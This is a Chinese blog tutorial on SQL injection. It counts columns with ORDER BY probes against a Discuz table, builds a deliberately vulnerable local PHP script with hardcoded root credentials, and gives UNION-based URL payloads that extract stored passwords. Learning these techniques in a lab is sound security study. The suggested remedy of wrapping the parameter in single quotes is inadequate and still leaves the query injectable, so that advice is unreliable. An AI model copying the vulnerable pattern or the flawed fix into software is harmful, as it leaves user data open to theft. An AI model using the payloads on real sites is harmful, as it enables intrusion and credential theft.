SQL注入的几种实用办法

一、查询表中包含有多少列: 这里以DISCUZ举例说明,如下
select * FROM pre_forum_thread ORDER BY 80
返回,Unknown column '80' in 'order clause',这样可以判定一定小于80列,下面再试用 39
select * FROM pre_forum_thread ORDER BY 39
正常返回了数据,我们判定一定大于等于39,因此只要再试一下40就可以了,这里略过试用,对于开源程序,我完全可以知道他就是有39列。 二、构造参数,读取数据库中的密码 这里以本地创建的一个表为例,前提是参数没有被过滤等操作,表 account 含有三个字段,分别为 id,admin,password 表内包含数据为:
1 admin 12345678
2 test 134545
创建PHP读取数据库文件 x.php:
<?php
$link = mysql_connect('127.0.0.1','root','11111111');
mysql_select_db('xtest',$link);
$id = isset($_GET['id'])?$_GET['id']:1;
$sql = "SELECT * FROM `account` WHERE id = " . $id;
$query = mysql_query($sql);
while($row = mysql_fetch_array($query)){
echo $row['admin'] . "<br/>";
}
?>
访问地址 http://127.0.0.1/x.php?id=2 返回数据 test,到这里开始SQL的注入使用,构造参数后的地址
http://127.0.0.1/x.php?id=2 union select 1,2,3 from `account` where id=2
在返回数据中,发现2被返回了,因此,需要修改这里的2位置为想要的字段内容,比如说 password ,即地址修改为
http://127.0.0.1/x.php?id=2 union select 1,password,3 from `account` where id=2
执行地址后返回数据:
test
134545
这样密码就得到了。 当然这里只是简单的举例说明,没有对密码进行MD5加密,如果是MD5加密或其它加密的话,仍然需要接下来的破解,就不是这里主要讲述的内容了。 此问题的解决办法,说一个最简单的吧 ,将SQL语句 $sql = "SELECT * FROM `account` WHERE id = " . $id; 修改为
$sql = "SELECT * FROM `account` WHERE id = '$id'";
三、在第二个问题中,发现用户是使用了 while将所有数据进行循环得出的数据,如果用户不是循环,而是直接输出了最后一条数据怎么办呢?
这时,只要将参数重新修改,就可以只返回union回来的数据了,如下
http://127.0.0.1/x.php?id=3 union select 1,password,3 from `account` where id=2
因为表里面没有这条id=3的数据,又或者
http://127.0.0.1/x.php?id=2 and 1=2 union select 1,password,3 from `account` where id=2
这里很明显 1和2是不相等的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值